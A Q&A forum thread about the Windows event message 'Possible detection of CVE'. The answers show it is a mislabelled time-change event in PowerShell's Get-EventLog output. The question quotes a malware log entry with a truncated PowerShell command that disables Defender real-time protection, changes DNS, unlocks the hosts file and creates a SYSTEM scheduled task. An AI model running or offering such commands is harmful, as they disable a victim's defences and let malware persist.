What does alert "Possible detection of CVE" mean?

Question

From Windows event log, did the exploit was blocked? Can I get what CVE number from event log so I can know the specific KB number?

39536 Apr 13 08:31 Information Microsoft-Windows-Kernel-General 
1 Possible detection of CVE: 2020-04-13T01:31:16.580703600Z
Additional Information: 2020-04-13T01:31:16.580796000Z
This Event is generated when an attempt to exploit a known vulnerability 2020-04-13T01:31:16.580703600Z) is detected.
This Event is raised by a User mode process.

Also I got this malware log

Apr 13 08:29 Information Service Control Manager 1073748869 A service was installed in the system.
Service Name:  SYYHQSMMFDSEFEVOTKNH
Service File Name:  %COMSPEC% /C "cmd /c powershell -c
Set-MpPreference -DisableRealtimeMonitoring $true;(get-wmiobject -class win32_networkadapterconfiguration -filter ipenabled=true).
SetDNSServerSearchOrder(@('8.8.8.8','9.9.9.9'))&powershell -c attrib -R C:\WINDOWS\system32\drivers\etc\hosts;$rh=-join([char[]](Get-Random -Count (6+(Get-Random)%6)(65..90+97..122)));$cmd='schtasks /create /ru system /sc MINUTE /mo 120 /tn Rtsa1 /F /tr \"powershell -c ''*awcna*

I already have patched the machine with MS 17-010 and haven't found successful logon from the log. So confusing..

Your infected, you need to either clean it of the malware or reinstall windows. — Moab, Apr 13 '20 at 12:20
Yes, but I need to analyze the root cause before clean the malware. — slowmotion, Apr 14 '20 at 07:07
I may figure it out using third party to view the vulnerabilities list but I am asking about the information from event log. This is not a waste of time because some companies pay me for this stuff. — slowmotion, Apr 17 '20 at 03:32

score 2 · Answer 1 · answered Aug 06 '21 at 01:49

I just posted this on a Microsoft forum question, and figured I'd share here (I like SE much better than MS forums :-P)

I just ran into this as well. One thing I did notice when trying to get more info is that there seems to be a discrepancy between what PowerShell is reporting and what the Event Viewer GUI is reporting. For Event 1 Category 5, I'm getting:

PowerShell: Possible detection of CVE: , Additional Information: . This Event is generated when an attempt to exploit a known vulnerability () is detected. This Event is raised by a User mode process.
GUI: The system time has changed to ‎ from ‎

There is an associated Event 24 Category 11 that is showing:

PowerShell: The description for Event ID '24' in Source 'Microsoft-Windows-Kernel-General' cannot be found. The local computer may not have the necessary registry information or message DLL files to display the message, or you may not have permission to access them. The following information is part of the event:
GUI: The time zone information was refreshed with exit reason . Current time zone bias is .

Given the data that was passed, it looks to me like the GUI is right (time adjustment), and PowerShell is getting the wrong descriptions (CVE detection) for the events. The first event is passing datetimes that look like before and after datetimes, and the second event's second parameter is -600, which I believe correlates to the timezone I'm in (AEST, GMT+10, so 600 minute adjustment).

Dean Peterson · Answer 2 · 2024-03-30T22:05:51.140

To expand on @DarkMoon's answer a bit, I saw the same "Possible detection of CVE" message text in PowerShell's Get-EventLog output. For that event, the message text from Get-EventLog disagrees with at least three other methods of querying the Windows Event Log:

Window's Event Viewer GUI.
PowerShell's Get-WinEvent.
Window's wevtutl command line utility.

All of those methods have the message text starting "The system time has changed to". Furthermore, PID 4 on my system refers to the System process, which may not be immune to being hacked, but it seems less likely than some other processes. I consider all this additional evidence that PowerShell's Get-EventLog is not reporting the correct message text. See examples below:

Windows Event Viewer

wevtutil

PS C:\> wevtutil qe System /rd:true /c:10 /f:text
...
Event[6]:
  Log Name: System
  Source: Microsoft-Windows-Kernel-General
  Date: 2023-03-09T08:41:45.5000000Z
  Event ID: 1
  Task: N/A
  Level: Information
  Opcode: Info
  Keyword: Time
  User: N/A
  User Name: N/A
  Computer: atacama
  Description:
The system time has changed to ‎2023‎-‎03‎-‎09T13:41:45.500000000Z from ‎2023‎-‎03‎-‎09T04:12:41.415750200Z.
Change Reason: System time synchronized with the hardware clock.
Process: '' (PID 4).
...

Get-WinEvent

PS C:\> Get-WinEvent -MaxEvents 1 -FilterHashtable @{ LogName = 'System'; Id = 1; ProviderName = 'Microsoft-Windows-Kernel-General' } | Format-List
TimeCreated  : 3/9/2023 8:41:45 AM
ProviderName : Microsoft-Windows-Kernel-General
Id           : 1
Message      : The system time has changed to
               ‎2023‎-‎03‎-‎09T13:41:45.500000000Z from
               ‎2023‎-‎03‎-‎09T04:12:41.415750200Z.
           Change Reason: System time synchronized with the hardware clock.
           Process: '' (PID 4).

Get-EventLog

PS C:\> Get-EventLog System -Source Microsoft-Windows-Kernel-General -InstanceId 1 -Newest 1 | Format-List
Index              : 97462
EntryType          : Information
InstanceId         : 1
Message            : Possible detection of CVE: 2023-03-09T13:41:45.5000000Z
                     Additional Information: 2023-03-09T04:12:41.4157502Z
                 This Event is generated when an attempt to exploit a
                 known vulnerability (2023-03-09T13:41:45.5000000Z) is
                 detected.
                 This Event is raised by a User mode process.


Category           : (5)
CategoryNumber     : 5
ReplacementStrings : {2023-03-09T13:41:45.5000000Z,
                     2023-03-09T04:12:41.4157502Z, 2, ...}
Source             : Microsoft-Windows-Kernel-General
TimeGenerated      : 3/9/2023 8:41:45 AM
TimeWritten        : 3/9/2023 8:41:45 AM
UserName           :

What does alert "Possible detection of CVE" mean?

2 Answers2